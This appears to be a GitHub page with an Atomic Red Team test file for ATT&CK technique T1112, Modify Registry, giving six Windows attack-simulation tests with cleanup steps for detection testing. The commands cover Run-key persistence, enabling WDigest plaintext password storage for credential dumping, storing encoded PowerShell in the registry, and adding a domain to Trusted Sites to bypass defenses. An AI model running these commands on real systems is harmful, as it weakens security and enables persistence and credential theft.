Skip to content

Latest commit

 

History

History
235 lines (147 loc) · 8.8 KB

T1112.md

File metadata and controls

235 lines (147 loc) · 8.8 KB
Raw

T1112 - Modify Registry

Description from ATT&CK

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in Persistence and Execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via Reg or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to establish Persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)

The Registry of a remote system may be modified to aid in execution of files as part of Lateral Movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often Valid Accounts are required, along with access to the remote system's Windows Admin Shares for RPC communication.

Atomic Tests


Atomic Test #1 - Modify Registry of Current User Profile - cmd

Modify the registry of the currently logged in user using reg.exe cia cmd console

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /t REG_DWORD /v HideFileExt /d 1 /f

Cleanup Commands:

reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /f


Atomic Test #2 - Modify Registry of Local Machine - cmd

Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights.

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d {some_other_executable} /f

Cleanup Commands:

reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f


Atomic Test #3 - Modify Registry of Another User Profile

Modify a registry key of each user profile not currently loaded on the machine using both powershell and cmd line tools.

Supported Platforms: Windows

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

# here is an example of using the same method of reg load, but without the New-PSDrive cmdlet.
# Here we can load all unloaded user hives and do whatever we want in the location below (comments)
$PatternSID = 'S-1-5-21-\d+-\d+\-\d+\-\d+$'

Write-Verbose -Message 'Gathering Profile List and loading their registry hives'
# Get Username, SID, and location of ntuser.dat for all users

$ProfileList = @()
$ProfileList = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\*' | Where-Object { $_.PSChildName -match $PatternSID } |
  Select  @{ name = "SID"; expression = { $_.PSChildName } },
          @{ name = "UserHive"; expression = { "$($_.ProfileImagePath)\ntuser.dat" } },
          @{ name = "Username"; expression = { $_.ProfileImagePath -replace '^(.*[\\\/])', '' } }

# Get all user SIDs found in HKEY_USERS (ntuder.dat files that are loaded)
$LoadedHives = Get-ChildItem Registry::HKEY_USERS | ? { $_.PSChildname -match $PatternSID } | Select @{ name = "SID"; expression = { $_.PSChildName } }

$SIDObject = @()

foreach ($item in $LoadedHives)
{
    $props = @{
        SID = $item.SID
    }

    $TempSIDObject = New-Object -TypeName PSCustomObject -Property $props
    $SIDObject += $TempSIDObject
}

# We need to use ($ProfileList | Measure-Object).count instead of just ($ProfileList).count because in PS V2
# if the count is less than 2 it doesn't work. :)
for ($p = 0; $p -lt ($ProfileList | Measure-Object).count; $p++)
{
    for ($l = 0; $l -lt ($SIDObject | Measure-Object).count; $l++)
    {
        if (($ProfileList[$p].SID) -ne ($SIDObject[$l].SID))
        {
            $UnloadedHives += $ProfileList[$p].SID
            Write-Verbose -Message "Loading Registry hives for $($ProfileList[$p].SID)"
            reg load "HKU\$($ProfileList[$p].SID)" "$($ProfileList[$p].UserHive)"

            Write-Verbose -Message 'Attempting to modify registry keys for each profile'
            #####################################################################
            reg add "HKEY_CURRENT_USER\$($ProfileList[$p].SID)\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /t REG_DWORD /v HideFileExt /d 1 /f
        }
    }
}

Write-Verbose 'Unloading Registry hives for all users'
# Unload ntuser.dat
### Garbage collection and closing of ntuser.dat ###
[gc]::Collect()
reg unload "HKU\$($ProfileList[$p].SID)"


Atomic Test #4 - Modify registry to store logon credentials

Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping)

Supported Platforms: Windows

Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Cleanup Commands:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f


Atomic Test #5 - Modify registry to store PowerShell code

Sets Windows Registry key containing base64-encoded PowerShell code.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
powershell_command PowerShell command to encode String Write-Host "Hey, Atomic!"
registry_key_storage Windows Registry Key to store code String HKCU:Software\Microsoft\Windows\CurrentVersion
registry_entry_storage Windows Registry entry to store code under key String Debug

Attack Commands: Run with powershell!

$OriginalCommand = '#{powershell_command}'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
$EncodedCommand =[Convert]::ToBase64String($Bytes)
$EncodedCommand
Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand

Cleanup Commands:

Remove-ItemProperty -Force -Path -Path #{registry_key_storage} -Name #{registry_entry_storage}


Atomic Test #6 - Add domain to Trusted sites Zone

Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365 as described here: https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf

Supported Platforms: Windows

Attack Commands: Run with powershell!

$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD; 
new-itemproperty $key$name -Name http  -Value 2 -Type DWORD; 
new-itemproperty $key$name -Name *     -Value 2 -Type DWORD;

Cleanup Commands:

$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\bad-domain.com\"
Remove-item  $key -Recurse